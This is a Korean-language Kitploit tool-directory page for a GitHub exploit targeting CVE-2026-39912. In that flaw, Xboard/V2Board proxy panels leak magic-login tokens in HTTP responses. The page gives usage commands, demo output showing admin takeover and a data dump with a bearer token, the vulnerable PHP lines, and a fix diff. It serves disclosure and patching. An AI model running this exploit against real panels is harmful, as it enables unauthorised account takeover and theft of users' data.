Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-39912 — Xboard / V2Board 비인가 계정 탈취 - 매직 링크 토큰 유출 (CVE-2026-39912) | Kitploit
도구/GitHubGitHub/chocapikk/cve-2026-39912
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board 비인가 계정 탈취 - 매직 링크 토큰 유출 (CVE-2026-39912)

저장소 보기
24개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2026-39912 - Xboard / V2Board 인증되지 않은 계정 탈취

loginWithMailLink에서 매직 링크 토큰 유출

CVECVE-2026-39912
CVSS9.1 (Critical)
CWECWE-201 (Insertion of Sensitive Information Into Sent Data)
영향V2Board >= 1.6.1 ~ 1.7.4 / Xboard 모든 버전 0.1.9+ 이하
수정아직 안 됨 (V2Board 2023년 6월 이후 중단됨)
공개일2026-04-09
발견자Valentin Lobstein (Chocapikk)
상세 분석chocapikk.com
수정 PRV2Board #981 / Xboard #873

TL;DR

loginWithMailLink 엔드포인트가 매직 로그인 링크를 이메일로만 보내지 않고 HTTP 응답 본문에 직접 반환합니다. 등록된 이메일을 아는 인증되지 않은 공격자는 두 번의 HTTP 요청으로 관리자를 포함한 모든 계정을 탈취할 수 있습니다.

영향을 받는 소프트웨어

  • V2Board - 오픈소스 프록시 프로토콜 관리 패널 (별표 8.7k, 중단됨)
  • Xboard - V2Board의 포크 (별표 4k+, 활발히 유지 중)

둘 다 주로 중국에서 널리 배포된 VPN/프록시 패널입니다. ZoomEye에 따르면 인터넷에 7,000개 이상의 인스턴스가 노출되어 있습니다.

요구 사항

  • login_with_mail_link_enable이 관리자 설정에서 활성화되어 있어야 함 (기본적으로 활성화되지 않음)
  • 유효한 등록된 이메일 주소

사용법

root@kitploit:~
# 의존성 설치
pip install requests

# 계정 탈취 + 데이터 덤프
python3 exploit.py http://target:7001 [email protected]

# 덤프를 파일로 저장
python3 exploit.py http://target:7001 [email protected] -o dump.json

데모

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - 인증되지 않은 계정 탈취
 매직 링크 토큰 유출 (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 git clone부터 is_admin: true까지 45분

[INFO] [email protected]에 대한 매직 링크 요청 중
[INFO] 유출됨: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] 인증됨 (admin=True)
[INFO] 사용자 정보: OK
[INFO] 구독: OK
[INFO] 활성 세션: OK
[INFO] 통계: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

버그

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // 호출자에게 토큰 유출됨
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // 포크에서 상속된 동일한 버그

수정 방법

root@kitploit:~
- return [true, $link];
+ return [true, true];

참고 자료

  • V2Board - 취약한 코드 (71번째 줄)
  • Xboard - 취약한 코드 (49번째 줄)
  • 버그를 도입한 원래 커밋 (2022-06-27)
도구 다운로드